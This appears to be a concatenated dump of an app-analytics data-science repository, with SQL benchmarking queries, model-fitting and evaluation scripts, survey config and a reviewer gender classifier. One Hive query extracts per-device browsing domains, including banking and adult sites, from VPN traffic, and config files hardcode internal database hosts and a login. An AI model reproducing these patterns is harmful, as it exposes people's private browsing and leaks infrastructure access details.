df['index'] = df['Unnamed: 0']
del df['Unnamed: 0']
#df = df[df['index']=='%_apps_under_20%_error']
df = df[df['index']=='mean']
#df['Store'] = platform
result.append(df)
result = pd.concat(result)
#result = result.groupby(['store_id', 'feed_id', 'category_id', 'range']).mul(axis='index').reset_index()
result = result.merge(market_size_df, on=['store_id', 'category_id', 'feed_id'])
result['rank_range_weight'] = result['range'].apply(lambda x: RANGE_WEIGHT_DICT[x])
for model in models:
result['weighted_inverse_average_error_%s'%model] = (1.0/result['rel_error_%s'%model]) * result['market_size'] * result['rank_range_weight']
result = result.drop_duplicates()
result.to_csv('data/final_summary.csv', index=False)
if __name__ == '__main__':
main()
<file_sep>/int-vs-m-benchmark/sql/benchmarking/get_daily_estimates.sql
drop temporary table if exists temp.dates;
create temporary table temp.dates (
constraint primary key (date)
)
select
distinct date
from
aa_benchmarking_ios.sbe_est_app_daily
where
date between @begin_date and @end_date;
DROP TEMPORARY TABLE IF EXISTS temp.aa_data;
CREATE TEMPORARY TABLE temp.aa_data
(CONSTRAINT PRIMARY KEY (ranking_date,
appstore_instance_id,
type,
application_id))
select
t.date as estimate_date,
DATE_ADD(t.date, INTERVAL 1 DAY) as ranking_date,
ai.id as appstore_instance_id,
t.store_id,
t.feed,
cm.iso_code,
ai.device_id,
fdtm.type,
-- cgm.distimo_name as category,
aa_real.units as aa_real,
t.estimate as aa_estimate,
t.rank as aa_rank,
t.app_id as application_id,
a.name as app
from
aa_benchmarking_ios.sbe_est_app_daily t
join temp.dates da
using(date)
join (
select
*
from
aa_benchmarking_ios.downloads d
union
select
app_id,
date,
store_id,
feed,
revenue as units
from
aa_benchmarking_ios.sales s
) aa_real
using(date, app_id, store_id, feed)
join aa_benchmarking_ios.country_mappings cm
using(store_id)
join aa_benchmarking_ios.feed_device_type_mappings fdtm
using(feed)
join aa_benchmarking_ios.category_mappings cgm
on t.category_id = appannie_category_id
join appstore.appstore_instances ai
on cm.country_id = ai.country_id
and fdtm.device_id = ai.device_id
join appstore.applications a
on t.app_id = a.id
where
find_in_set(cm.iso_code, @country)
and find_in_set(cgm.distimo_name, @category)
group by ranking_date,appstore_instance_id,type,application_id
;
SELECT
aa.estimate_date,
aa.ranking_date,
aa.store_id,
aa.feed,
aa.iso_code,
aa.device_id,
if(aa.device_id = 1, 'iphone', if(aa.device_id = 2, 'ipad', 'unknown')) as device,
aa.type,
-- aa.category,
aa.aa_real,
ifnull(d.derived_value, ifnull(d.real_value, null)) as d_real,
aa.aa_estimate,
d.estimate as d_estimate,
aa.aa_rank,
d.estimate_rank as d_rank,
aa.application_id,
aa.app
FROM estimates.application_data_appstore d
JOIN temp.aa_data aa
ON aa.ranking_date = d.date
AND aa.appstore_instance_id = d.appstore_instance_id
AND aa.type = d.type
AND aa.application_id = d.application_id
WHERE
d.estimate_extrapolated = 0
and d.real_value is not null;<file_sep>/aa_au_model/hive_ql/get_domains.sql
-- get per device_id all domains a user has requested per day
-- only works with .com addresses
-- only the last alphabetic characters preceding .com are parsed
-- only the requests made from Safari and Chrome are used
-- only the list of selected apps below are outputted ds environment
-- change date range and folder to output data to on ds environment
DROP TABLE IF EXISTS devices_hosts;
CREATE TABLE devices_hosts
AS
SELECT
datestr,
device_id,
PARSE_URL(uri, 'HOST') AS hostname,
COUNT(*) AS times
FROM
vpn_sample_data_ingest
WHERE
datestr >= '2015-01-18'
AND datestr <= '2015-01-24'
AND (bundleid = 'com.apple.mobilesafari' OR bundleid = 'com.google.chrome.ios')
GROUP BY
datestr,
device_id,
PARSE_URL(uri, 'HOST')
;
DROP TABLE IF EXISTS devices_domains;
CREATE TABLE devices_domains
AS
SELECT
datestr,
device_id,
REGEXP_EXTRACT(hostname, '(.*?)([A-z]+.com)', 2) AS domain,
SUM(times) AS times
FROM
devices_hosts
GROUP BY
datestr,
device_id,
REGEXP_EXTRACT(hostname, '(.*?)([A-z]+.com)', 2)
;
DROP TABLE if exists top_sites;
CREATE TABLE top_sites
AS
SELECT *
FROM devices_domains
WHERE domain IN (
'google.com',
'facebook.com',
'youtube.com',
'amazon.com',
'yahoo.com',
'wikipedia.org',
'twitter.com',
'ebay.com',
'linkedin.com',
'reddit.com',
'imgur.com',
'craigslist.org',
'tumblr.com',
'go.com',
'netflix.com',
'pinterest.com',
'live.com',
't.co',
'bing.com',
'blogspot.com',
'instagram.com',
'paypal.com',
'espn.go.com',
'cnn.com',
'imdb.com',
'huffingtonpost.com',
'chase.com',
'apple.com',
'nytimes.com',
'weather.com',
'diply.com',
'yelp.com',
'wordpress.com',
'bankofamerica.com',
'buzzfeed.com',
'ziddu.com',
'microsoft.com',
'wellsfargo.com',
'stackoverflow.com',
'etsy.com',
'walmart.com',
'msn.com',
'dropbox.com',
'wikia.com',
'intuit.com',
'zillow.com',
'aol.com',
'bestbuy.com',
'comcast.net',
'foxnews.com',
'github.com',
'salesforce.com',
'about.com',
'amazonaws.com',
'washingtonpost.com',
'usps.com',
'baidu.com',
'pandora.com',
'outbrain.com',
'target.com',
'indeed.com',
'forbes.com',
'reference.com',
'kickass.so',
'hulu.com',
'adobe.com',
'groupon.com',
'cnet.com',
'slickdeals.net',
'dailymail.co.uk',
'googleusercontent.com',
'ups.com',
'businessinsider.com',
'pornhub.com',
'usatoday.com',
'americanexpress.com',
'vimeo.com',
'xvideos.com',
'tripadvisor.com',
'deviantart.com',
'homedepot.com',
'flickr.com',
'capitalone.com',
'irs.gov',
'bleacherreport.com',
'twitch.tv',
'force.com',
'microsoftonline.com',
'googleapis.com',
'newegg.com',
'wsj.com',
'gfycat.com',
'att.com',
'verizonwireless.com',
'stackexchange.com',
'bbc.com',
'ask.com',
'lifehacker.com',
'godaddy.com',
'fedex.com'
)
;
DROP TABLE if exists csvexport;
CREATE TABLE csvexport (
`datestr` string,
`device_id` string,
`domain` string,
`times` bigint)
row format delimited fields terminated by '\t'
lines terminated by '\n'
STORED AS TEXTFILE
LOCATION 's3://aardvark-prod-pdx-ds-workspace/outputfolder';
;
INSERT OVERWRITE TABLE csvexport
SELECT * FROM top_sites <file_sep>/evaluation/py/evaluate_quality.py
"""
Evaluate the quality of estimation.
Different processors (in internal/processor.py) can be chained together with ChainProcessor.
Go internal/processor.py about how to use different processors.
"""
# Author: <NAME> <<EMAIL>>
import os
import os.path
import sys
import pandas as pd
from internal.processor import *
monthly_evaluator = ChainProcessor(RelErrorCalculator(est_column='estimate'),
AbsErrorCalculator(est_column='estimate'),
[UnitRankRangeFilter([1, 20]),
RelErrorRatioEvaluator(0.2),
DailySbeOver20ErrorEvaluator(),
DailySbeErrorEvaluator()],
[UnitRankRangeFilter([21, 200]),
RelErrorRatioEvaluator(0.2),
DailySbeOver20ErrorEvaluator(),
DailySbeErrorEvaluator()],
[UnitRankRangeFilter([201, 1000]),
RelErrorRatioEvaluator(0.2),
DailySbeOver20ErrorEvaluator(),
DailySbeErrorEvaluator()],
[MedianRankRangeFilter([1, 20]),
SampleNumEvaluator(),
AbsErrorMedianEvaluator(),
AbsErrorAvgEvaluator(),
RelErrorMedianEvaluator(),
RelErrorAvgEvaluator()],
[MedianRankRangeFilter([21, 200]),
SampleNumEvaluator(),
AbsErrorMedianEvaluator(),
AbsErrorAvgEvaluator(),
RelErrorMedianEvaluator(),
RelErrorAvgEvaluator()],
[MedianRankRangeFilter([201, 1000]),
SampleNumEvaluator(),
AbsErrorMedianEvaluator(),
AbsErrorAvgEvaluator(),
RelErrorMedianEvaluator(),
RelErrorAvgEvaluator()],
[HeaderWriter("(All apps) "),
RelErrorRatioEvaluator(0.2),
EstimationSDEvaluator(),
KSEvaluator()])
def main():
input_dir = sys.argv[1]
for f in filter(lambda s: s.endswith(".csv"), os.listdir(input_dir)):
print(f)
print("--------")
full_path = os.path.join(input_dir, f)
_estimate_quality(pd.read_csv(full_path))
def _estimate_quality(df):
(_, _, res) = monthly_evaluator.process(df)
print(res)
if __name__ == '__main__':
main()
<file_sep>/survey/201503/lib/config.py
__author__ = 'jjanssen'
'''
Definition of age bins, values in years, -1 for infinty
'''
age_bin_tuples = [ (13, 17), (18, 24), (25, 34), (35, 44),(45, 54), (55, -1)]
'''
Definition of genders
'''
genders = ['male','female']
'''
Definition of duration bins, values in minutes
'''
duration_bin_tuples = [(0,29), (30, 59), (60, 359), (360, 719), (720, -1)]
'''
Definition of population sizes
should have # gender * # age_bins entries
starting from the lowest age_bin
per bin start with Male end with Female
'''
W1_POPULATION_SIZE = [ 26825449, # Male
25530584, # Female
22016187, # Male
21502052, # Female
41556996, # Male
42300666, # Female
39687243, # Male
46646006] # Female
W2_POPULATION_SIZE = [ 10670097,# Male
10202991,# Female
16018278,# Male
15195999,# Female
22353554,# Male
21778946,# Female
20205422,# Male
20319003,# Female
21279110,# Male
21849087,# Female
40861642,# Male
47872468]# Female
'''
Definition of survey datapaths
'''
W1_DATA_PATH = '../201412/data/survey_reformatted_2014Q4_US.csv'
W2_DATA_PATH = '../201503/data/survey_reformatted_2015Q1_US.csv'
<file_sep>/int-vs-m-benchmark/android-install-vs-downloads/sql/get_best_countries.sql
select
date,
appstore_instance_id,
iso_code,
type,
min(rank) as best_rank,
max(rank) as worst_rank,
count(distinct(rank)) as n_sample,
count(distinct(if(rank <= 20, rank, null))) as n_top_rank
from
market.rankings r
join (
select
distinct date
from
market.rankings
where
date between 20140601 and 20140630) x
using(date)
join market.appstore_instances ai
on r.appstore_instance_id = ai.id
join market.countries cn
on ai.country_id = cn.id
join market.rankcategories rc
on r.rankcategory_id = rc.id
join market.categories cg
on rc.category_id = cg.id
join estimates.application_data_market ad
using(date, appstore_instance_id, application_id, type)
where
cn.iso_code in ('US', 'GB', 'JP', 'DE', 'FR', 'DE', 'NL', 'KR')
#cn.iso_code in ('AU', 'IT', 'RU', 'CA')
and rc.type in ('free', 'paid')
and cg.name = 'Top Overall'
and (
ad.real_value is not null
or ad.preinstalled_value is not null
)
group by
date,
appstore_instance_id,
type
order by
type,
n_top_rank DESC,
best_rank ASC,
n_sample
;<file_sep>/exact-matching-improvement/lib/config.py
import unicodedata
import sys
database = 'ds_tmp'
user= 'jjanssen'
temp_host = 'ds-rds-tmp.crlexxwtzodp.us-east-1.rds.amazonaws.com'
host = 'ds-rds-2.crlexxwtzodp.us-east-1.rds.amazonaws.com'
password = '<PASSWORD>'
DNAExcludedTermsType = {'ADDRESS':(1, 'address'),
'APP_NAME': (2, 'app_name'),
'COMPANY_SUFFIX':(3, 'company_suffix'),
'COUNTRY_ABBR': (4, 'country_abbr'),
'COUNTRY_DOMAIN':(5, 'country_domain'),
'GLOBAL_DOMAIN': (6, 'global_domain'),
'PREFIX_WORD':(7, 'prefix_word'),
'PREP': (8, 'prep'),
'WEBHOST_DOMAIN': (9, 'webhost_domain')}
removal_translate_table = dict.fromkeys(i for i in xrange(sys.maxunicode)
if unicodedata.category(unichr(i)).startswith('P')
or unicodedata.category(unichr(i)).startswith('Z')
or unicodedata.category(unichr(i)).startswith('S')
or unicodedata.category(unichr(i)).startswith('C')
or unicodedata.category(unichr(i)).startswith('M'))<file_sep>/product_quality/internal/utilities_date.py
"""
Date related utilities
"""
# Author: <NAME> <<EMAIL>>
from dateutil import rrule
from dateutil.relativedelta import relativedelta
def make_last_day_of_month(dt):
"""From
http://stackoverflow.com/questions/42950/get-last-day-of-the-month-in-python
"""
if dt.month == 12:
return dt.replace(day=31)
return dt.replace(month=dt.month + 1, day=1) - relativedelta(days=1)
def make_daily_daterange(dtstart, dtend):
"""Return the daterange specified from dtstart to dtend (inclusive), at daily level.
"""
return map(lambda x: str(x.date()),
rrule.rrule(rrule.DAILY, dtstart=dtstart, until=dtend))
<file_sep>/old_investigations/unweight_estimates.py
"""
Unweight estimates based on weights file.
"""
from optparse import OptionParser
import os.path
import pandas as pd
import numpy as np
from internal.calculate_sda import _extract_meta_info_in_filename
def parse_options():
parser = OptionParser()
parser.add_option('-e', '--estimates', dest='f_estimates',
help='Required. Estimates data, generated by run_fetch_and_concat.py')
parser.add_option('-w', '--weights', dest='f_weights',
help='Required. Weights data, generated by gen_rank_data.py')
(opts, args) = parser.parse_args()
if not opts.f_estimates:
parser.print_help()
parser.error("Estimates file is necessary!")
if not opts.f_weights:
parser.print_help()
parser.error("Weights file is necessary!")
return opts
if __name__ == '__main__':
opts = parse_options()
df_estimates = pd.read_csv(opts.f_estimates)
df_weights = pd.read_csv(opts.f_weights)
df_merged = pd.merge(df_estimates, df_weights, on=['store_id', 'category_id', 'feed_id', 'date'], how='inner')
df_merged['estimate'] = df_merged['estimate']/df_merged['weight']
df_merged[['category_id', 'rank', 'app_id', 'estimate', 'date', 'feed_id', 'store_id', 'units']].to_csv(opts.f_estimates)
print("The files have been modified in ./data/")
<file_sep>/audience/legacy_experiments/predict_reviewer_gender.py
# -*- coding: utf-8 -*-
# <nbformat>3.0</nbformat>
# <codecell>
import nltk
import pandas as pd
import random
import re
import numpy as np
from unidecode import unidecode
from guess_language import guess_language
import enchant
import psycopg2
DATA_DIR = '/home/rafael/appannie/data/demie'
CONN=psycopg2.connect("dbname=aa_reviews_android user=aa host=10.38.48.144 port=5432")
CURSOR=CONN.cursor()
def features(word):
featdict = {}
feardict['full'] = word
featdict['lenght'] = len(word)
for i in range(1,5):
featdict['last_%s'%i] = word[-i:]
return featdict
def get_male_probability(text, regex, gender_classifier, surname_classifier):
p_gender = []
p_name = []
text = unidecode(text.decode('utf-8')).lower()
tokens = text.split(' ')
for word in tokens:
word = regex.sub('', word)
if len(word)<2 and len(tokens)>1:
continue
p_gender.append(gender_classifier.prob_classify(features(word)).prob('male'))
p_name.append(surname_classifier.prob_classify(features(word)).prob('name'))
p_gender = np.array(p_gender)
p_name = np.array(p_name)
p_male = None
if len(p_gender)>0:
p_male = np.around(p_gender[p_name.argmax()], 3)
return p_male, text, np.around(p_gender, 3), np.around(p_name, 3)
def main():
surname_df = pd.read_csv('%s/dist.all.last'%DATA_DIR)
surname_df['is_surname'] = True
surname_df['name'] = surname_df['name'].str.lower()
surname_df = surname_df.dropna()
male_df = pd.read_csv('%s/dist.male.first'%DATA_DIR)
male_df['is_male'] = True
male_df['name'] = male_df['name'].str.lower()
male_df = male_df.dropna()
female_df = pd.read_csv('%s/dist.female.first'%DATA_DIR)
female_df['is_female'] = True
female_df['name'] = female_df['name'].str.lower()
female_df = female_df.dropna()
names_df = male_df.merge(female_df, on='name', how='outer', suffixes=('_male', '_female'))
names_df['clean_name'] = names_df['name']
del names_df['name']
names_df = names_df[['clean_name', 'frecuency%_male', 'frecuency%_female', 'is_male']]
names_df['frecuency%_male'] = names_df['frecuency%_male'].fillna(0.0)
names_df['frecuency%_female'] = names_df['frecuency%_female'].fillna(0.0)
names_df['is_male'] = -1
names_df['is_male'][names_df['frecuency%_male']>names_df['frecuency%_female']] = 1
names_df['is_male'][names_df['frecuency%_male']<=names_df['frecuency%_female']] = 0
fnames = nltk.corpus.names.words('female.txt')
mnames = nltk.corpus.names.words('male.txt')
names = [(n.lower().replace(' ',''), 'female') for n in female_df['name'].values]
names += [(n.lower().replace(' ',''), 'male') for n in male_df['name'].values]
names += [(n.lower().replace(' ',''), 'female') for n in fnames]
names += [(n.lower().replace(' ',''), 'male') for n in mnames]
new = []
for i in names:
if i not in new:
new.append(i)
names = new
benchmark_df = pd.DataFrame(names, columns=['clean_name', 'gender'])
benchmark_df = benchmark_df.merge(names_df, on='clean_name', how='outer')
benchmark_df['is_male'][((np.isnan(benchmark_df['is_male'])==True)|(benchmark_df['is_male']==-1))
& (benchmark_df['gender']=='male')] = 1
benchmark_df['is_male'][((np.isnan(benchmark_df['is_male'])==True)|(benchmark_df['is_male']==-1))
& (benchmark_df['gender']=='female')] = 0
benchmark_df = benchmark_df.sort(['clean_name', 'is_male'], ascending=True)[['clean_name', 'is_male']].drop_duplicates()
surnames = [(n, 'name') for n in benchmark_df['clean_name']]
for n in surname_df['name']:
if n not in benchmark_df['clean_name']:
surnames.append((n, 'surname'))
random.shuffle(surnames)
surname_trainset_feat = [(features(n), g) for (n,g) in surnames]
surname_classifier = nltk.NaiveBayesClassifier.train(surname_trainset_feat)
print nltk.classify.accuracy(surname_classifier, surname_trainset_feat)
surname_classifier.show_most_informative_features(10)
names = [(n, 'female') for n in benchmark_df['clean_name'][benchmark_df['is_male']==0]]
names += [(n, 'male') for n in benchmark_df['clean_name'][benchmark_df['is_male']==1]]
random.shuffle(names)
gender_trainset_feat = [(features(n), g) for (n,g) in names]
gender_classifier = nltk.NaiveBayesClassifier.train(gender_trainset_feat)
print nltk.classify.accuracy(gender_classifier, gender_trainset_feat)
gender_classifier.show_most_informative_features(10)
query = 'SELECT reviewer FROM reviewer_p where p_language=%s and p_male<%s'
params = ('en', 0.0,)
CURSOR.execute(query, params)
rows=CURSOR.fetchall()
query = 'UPDATE reviewer_p SET p_male = %s WHERE reviewer=%s'
rx = re.compile('[\W\d_]')
for row in rows:
if row == None:
continue
if row[0]==None:
continue
p_male = get_male_probability(row[0], rx, gender_classifier, surname_classifier)
params = (p_male[0], row[0])
print CURSOR.mogrify(query, params)
CURSOR.execute(query, params)
CONN.commit()
if __name__ == '__main__':
main()
<file_sep>/int-vs-m-benchmark/sql/ios/1000f1-refine_application_data-drop_not_ranked_apps.sql
/*
FUNCTIONAL DESCRIPTION : Remove applications that are not ranked, final check before the actual estimation
DEPENDS ON TABLE(S) : temp.application_data, temp.rankings
RESULTS IN TABLE(S) : temp.application_data
PROCEDURE : STEP 1. Find all application that are not present in rankings
STEP 2. Remove those from temporary table temp.application_data
*/
-- STEP 1.
DROP TEMPORARY TABLE IF EXISTS temp.not_ranked_applications;
CREATE TEMPORARY TABLE temp.not_ranked_applications(
date date NOT NULL,
device_id TINYINT unsigned NOT NULL,
country_id smallint(5) unsigned NOT NULL,
type ENUM('paid','gross','free') NOT NULL,
application_id int(10) unsigned NOT NULL,
CONSTRAINT PRIMARY KEY (device_id,country_id, type, application_id)
)
AS
SELECT a.date, a.device_id,a.country_id,a.type,a.application_id
FROM temp.application_data a
LEFT JOIN temp.rankings r ON
r.date = a.date AND
r.device_id = a.device_id AND
r.country_id = a.country_id AND
r.type = a.type AND
r.application_id = a.application_id
WHERE r.application_id is null;
-- REMOVE NOT RANKED APPS FROM APPLICATION_DATA
-- STEP 2.
DELETE a.* FROM temp.application_data a
JOIN temp.not_ranked_applications r ON r.date = a.date AND
r.device_id = a.device_id AND
r.country_id = a.country_id AND
r.type = a.type AND
r.application_id = a.application_id
;
<file_sep>/datathon/early_adopters/README.MD
# create the directory for early-adopter project
# We have created a draft to describe the plan
## https://docs.google.com/document/d/1sEcW82G0TdH20APacPo6EEiJuEUeLoy6Ks_zNkNthRw/edit
# The presentation cound be found below:
## https://docs.google.com/presentation/d/1VTTCgGrHg2KyXkEILRTCqCqDYMLOfz_v_-ZK3l5OhCc/edit?ts=56055893
<file_sep>/ranking_change/find_clusters.py
'''
Created on Aug 30, 2013
@author: perezrafael
'''
import pandas as pd
import config
import operator
import scipy
import numpy as np
from numpy.linalg import norm
from scipy import spatial
from sklearn import cluster
import csv
from sklearn.svm import SVR
from sklearn.cross_validation import KFold
import matplotlib.pyplot as plt
from sklearn import linear_model
import statsmodels.api as sm
from scipy import optimize
import itertools
metadata_f = '/Users/perezrafael/appannie/data/2013-09-10_US_UK_JP_CN/debug_file_143441_6014+rsd+zvalue.csv'
iphone_ranks = pd.DataFrame({'Rank': np.arange(1, 1001)})
ipad_ranks = pd.DataFrame({'Rank': np.arange(1, 401)})
rank_range_limits = {20: [1, 20],
60: [21, 60],
200: [61, 200],
1000: [201, 1000]}
#pd.set_eng_float_format(accuracy=3, use_eng_prefix=True)
#pd.set_printoptions(precision = 3)
feed_type_format = {'IPHONE_FREE': 'Free',
'IPHONE_PAID': 'Paid',
'IPHONE_GROSSING': 'Grossing',
'IPAD_FREE': 'Free',
'IPAD_PAID': 'Paid',
'IPAD_GROSSING': 'Grossing',
}
feed_market_format = {'IPHONE_FREE': 'iPhone',
'IPHONE_PAID': 'iPhone',
'IPHONE_GROSSING': 'iPhone',
'IPAD_FREE': 'iPad',
'IPAD_PAID': 'iPad',
'IPAD_GROSSING': 'iPad',
}
min_IAP_from_subs = 0.0
grossing_business_models = {
'Pure Free': [operator.eq, 0.0, False, operator.eq, 0.0],
'Pure Paid': [operator.gt, 0.0, False, operator.eq, 0.0],
'Freemium': [operator.eq, 0.0, True, operator.le, min_IAP_from_subs],
'Paymium': [operator.gt, 0.0, True, operator.le, min_IAP_from_subs],
'Freemium + Subs': [operator.eq, 0.0, True, operator.gt, min_IAP_from_subs],
'Paymium + Subs': [operator.gt, 0.0, True, operator.gt, min_IAP_from_subs]
}
#### Data cleaning ######
def preprocess_metadata(df):
df['SS Country'] = df['APP Country'].apply(lambda x: config.IOS_STORES_DICT[x])
del df['APP Country']
df['SS Category'] = df['SS-APP Category-S'].apply(lambda x:config.IOS_CATEGORIES_DICT[x])
df['SS Type'] = df['SS-APP Feed-S'].apply(lambda x: feed_type_format[x])
df['SS Market'] = df['SS-APP Feed-S'].apply(lambda x: feed_market_format[x])
del df['SS-APP Feed-S']
df = df.fillna(0.0)
df['DATE-Week Day'] += 1
df.rename(columns={'DATE-Day': 'SS Date',
'AN-APP Actual-S': 'SS AN-APP Actual-S',
'INT-APP Estimate Weighted SBE-S': 'SS-APP Estimate Weighted SBE-S',
'AN-APP Actual Adj-C': 'SS Adjusted Actual',
'DATE-Week Day' : 'SS-DATE-Week Day'},
inplace=True)
matching = [s for s in df.columns if 'SS' in s]
df = df[matching]
df.rename(columns={'SS Country': 'Country',
'SS Category': 'Category',
'SS Type': 'Type',
'SS Market': 'Market',
'SS Date': 'Date',
'SS-Business Model-C': 'business_model',
'SS-APP ID-S': 'App ID',
'SS-APP Rank-S': 'Rank',
'SS-APP Estimate Weighted SBE-S': 'Estimate',
'SS Adjusted Actual': 'Adjusted Actual'},
inplace=True)
df['rank_range'] = 1000
#df['rank_range'][df['Rank']<50] = 50
#for rank in range(50,1600)[0::100]:
# df['rank_range'][(df['Rank']<rank) & (df['rank_range']==0)] = rank
df['rank_range'][df['Rank']<201] = 200
df['rank_range'][df['Rank']<61] = 60
df['rank_range'][df['Rank']<21] = 20
df = df.fillna(0.0)
return df
def train_models(df, algorithm):
def weightfunc(x):
df = pd.DataFrame(x[:,0])
df['r'] = 1.0/np.log(df[0])
df['r'][df[0]<=20] = 1.0
#df['r'][df[0]>200] = 0.05
return df['r'].values
#def fitfunc1(p, x):
# r = p[0]*(x[:,0]**p[1]) + p[2]*(x[:,1]**p[3])
#r = p[0]*(x[:,0]**p[1]) + p[2]*x[:,1]
#r = p[0]*x[:,0] + p[1]*x[:,1]
# return r
def fitfunc1(p, x):
r = p[0] * (x[:,0] ** p[1])
return r
def errfunc1(p, x, y):
r = fitfunc1(p, x) - y
return r
def errfunc2(p, x, y):
r = np.log((fitfunc1(p, x)**2.0)/(y**2.0)) * weightfunc(x)
return r
def errfunc3(p, x, y):
r = np.log((fitfunc1(p, x)**2.0)/(y**2.0))
return r
def errfunc4(p, x, y):
r = np.log((fitfunc1(p, x)**2.0)/(y**2.0)) / x[:,0]
return r
def errfunc5(p, x, y):
r = np.log((fitfunc1(p, x)**2.0)/(y**2.0)) / (x[:,0] * y)
return r
training_features = [s for s in df.columns if "SS-5 Star Ratings Previous Week Cur Version-S" in s]
training_features.append('Rank')
result = []
df = df.sort(['Country', 'Category', 'Market', 'Type', 'rank_range'], ascending=False)
for n, g in df.groupby(['Country', 'Category', 'Market', 'Type', 'Date']):
model = None
train0 = g[g['SS-APP Universal-S']==False]
train0 = train0.set_index(np.arange(train0.shape[0]))
if n[2] == 'iPhone':
test = iphone_ranks.copy()
elif n[2] == 'iPad':
test = ipad_ranks.copy()
#test0 = test0[(test0['Rank']>=rank_range_limits[n[4]][0]) & (test0['Rank']<=rank_range_limits[n[4]][1])]
kf = KFold(len(train0), n_folds=5, indices=True)
if False:
try:
model = algorithm.fit(train[['Rank']], train['SS AN-APP Actual-S'])
g['only_rank_new_estimate'] = model.predict(g[['Rank']])
g['new_estimate'] = g['only_rank_new_estimate']
except:
pass
try:
model = algorithm.fit(train[training_features], train['SS AN-APP Actual-S'])
g['new_estimate'] = model.predict(g[training_features])
except:
pass
if False:
try:
glm = sm.GLM(train['SS AN-APP Actual-S'], train[['Rank']], family=sm.families.Gamma())
g['only_rank_new_estimate'] = glm.fit().predict(g[['Rank']])
g['new_estimate'] = g['only_rank_new_estimate']
except:
pass
try:
glm = sm.GLM(train['SS AN-APP Actual-S'], train[training_features], family=sm.families.Gamma())
g['new_estimate'] = glm.fit().predict(g[training_features])
except:
pass
#if True:
test_out = []
for tr, te in kf:
p0 = [1.0, 1.0, 1.0, 1.0]
train = train0.loc[tr]
#test = train0.loc[te]
if n[2] == 'iPhone':
test = iphone_ranks[iphone_ranks['Rank'].isin(train['Rank'])==False]
elif n[2] == 'iPad':
test = ipad_ranks[ipad_ranks['Rank'].isin(train['Rank'])==False]
try:
p1, success = optimize.leastsq(errfunc1, p0[:], args=(train[['Rank']].values, train['SS AN-APP Actual-S'].values), factor=0.1)
except Exception, e:
print n, 'new_estimate_1', e
test['new_estimate_1'] = fitfunc1(p1, test[['Rank']].values)
try:
p2, success = optimize.leastsq(errfunc2, p0[:], args=(train[['Rank']].values, train['SS AN-APP Actual-S'].values), factor=0.1)
except Exception, e:
print n, 'new_estimate_2', e
test['new_estimate_2'] = fitfunc1(p2, test[['Rank']].values)
try:
p3, success = optimize.leastsq(errfunc3, p0[:], args=(train[['Rank']].values, train['SS AN-APP Actual-S'].values), factor=0.1)
except Exception, e:
print n, 'new_estimate_3', e
test['new_estimate_3'] = fitfunc1(p3, test[['Rank']].values)
try:
p4, success = optimize.leastsq(errfunc4, p0[:], args=(train[['Rank']].values, train['SS AN-APP Actual-S'].values), factor=0.1)
except Exception, e:
print n, 'new_estimate_4', e
test['new_estimate_4'] = fitfunc1(p4, test[['Rank']].values)
try:
p5, success = optimize.leastsq(errfunc5, p0[:], args=(train[['Rank']].values, train['SS AN-APP Actual-S'].values), factor=0.1)
except Exception, e:
print n, 'new_estimate_5', e
test['new_estimate_5'] = fitfunc1(p5, test[['Rank']].values)
actuals_test = g.merge(test, on='Rank')
actuals_test = get_errors(actuals_test)
test_out.append(actuals_test)
test_out = pd.concat(test_out)
test_out = test_out.groupby(['Country', 'Category', 'Type', 'Date', 'App ID']).mean().reset_index()
test_out['Actual'] = test_out['Adjusted Actual']
plot_80_20(test_out)
g = g.merge(test_out, on='Rank', how='outer')
result.append(g)
result = pd.concat(result)
result['new_estimate_1'][result['new_estimate_1']<1.0] = 1.0
result['new_estimate_2'][result['new_estimate_2']<1.0] = 1.0
result['new_estimate_3'][result['new_estimate_3']<1.0] = 1.0
result['new_estimate_4'][result['new_estimate_4']<1.0] = 1.0
result['new_estimate_5'][result['new_estimate_5']<1.0] = 1.0
return result
def get_clusters(df):
result = []
total_dates = df['Date'].drop_duplicates().shape[0]
for n, g in df.groupby(['Country', 'Category', 'Market', 'Type', 'business_model']):
if g.shape[0]<total_dates:
continue
g = g.drop(['App ID'], axis=1)
corr = g.corr()
#corr = corr.loc[['SS AN-APP Actual-S']]
#del corr['SS AN-APP Actual-S']
corr['Country'] = n[0]
corr['Category'] = n[1]
corr['Type'] = n[2]
corr['business_model'] = n[3]
#corr['App ID'] = n[4]
corr = corr.fillna(0.0)
result.append(corr)
result = pd.concat(result)
result.to_csv('corr.csv', index=False)
for n, g in result.groupby(['Country', 'Category', 'Type', 'business_model']):
if g.shape[0] < 10:
continue
for column in g.columns:
if column in ['App ID', 'Country', 'Category', 'Type', 'business_model']:
continue
abs_mean = g[column].abs().mean()
if abs_mean < 0.0:
del g[column]
model = cluster.KMeans(n_clusters=3)
#model = cluster.DBSCAN(eps=0.5, min_samples=2, metric='chebyshev')
model.fit(g.drop(['App ID', 'Country', 'Category', 'Type', 'business_model'], axis=1).values)
g['Cluster'] = model.labels_
print n
#print g.columns
#print g[['Cluster']].groupby('Cluster').size()
print g.drop(['App ID', 'Country', 'Category', 'Type', 'business_model'], axis=1).abs().mean()
continue
for n2, g2 in g.groupby('Cluster'):
print n2, g2.shape[0]
print g2.drop(['App ID', 'Country', 'Category', 'Type', 'business_model'], axis=1).abs().mean()
def plot_actuals(df):
########### Plor actuals VS Estimates ################
for n,g in df.groupby(['Country', 'Category', 'Type', 'Date']):
fig = plt.figure()
ax = fig.add_subplot(111)
p2, = ax.plot(g['Actual'], g['Estimate'], 'b.', alpha=0.4, label='Original SBE')
p3, = ax.plot(g['Actual'], g['new_estimate_1'], 'g.', alpha=0.4, label='est-actual')
p3, = ax.plot(g['Actual'], g['new_estimate_2'], 'c.', alpha=0.4, label='log(est^2/actual^2)*weight')
p3, = ax.plot(g['Actual'], g['new_estimate_3'], 'm.', alpha=0.4, label='log(est^2/actual^2)')
p3, = ax.plot(g['Actual'], g['new_estimate_4'], 'y.', alpha=0.4, label='log(est^2/actual^2)/rank')
p3, = ax.plot(g['Actual'], g['new_estimate_5'], 'k.', alpha=0.4, label='log(est^2/actual^2)/(rank*actual)')
p1, = ax.plot(g['Actual'], g['Actual'], 'r-', label='Actual')
ax.legend(loc='best', prop={'size':10})
title = 'difference_%s'%str(n)
plt.title(title)
plt.xlabel('Actual')
plt.ylabel('Estimate')
ax.set_yscale('log')
ax.set_xscale('log')
plt.grid()
fig.savefig('plots/new_model/%s.png'%title)
def plot_80_20(df):
########### Plot 80-20 curves ################
for n,g in df.groupby(['Country','Category', 'Type', 'Date']):
fig = plt.figure()
g = g.sort('Actual', ascending=False)
g = g[:200]
ax = fig.add_subplot(111)
y_values = (np.arange(g.shape[0])*1.0/g.shape[0])*100.0
g = g.sort('orig_rel_error', ascending=True)
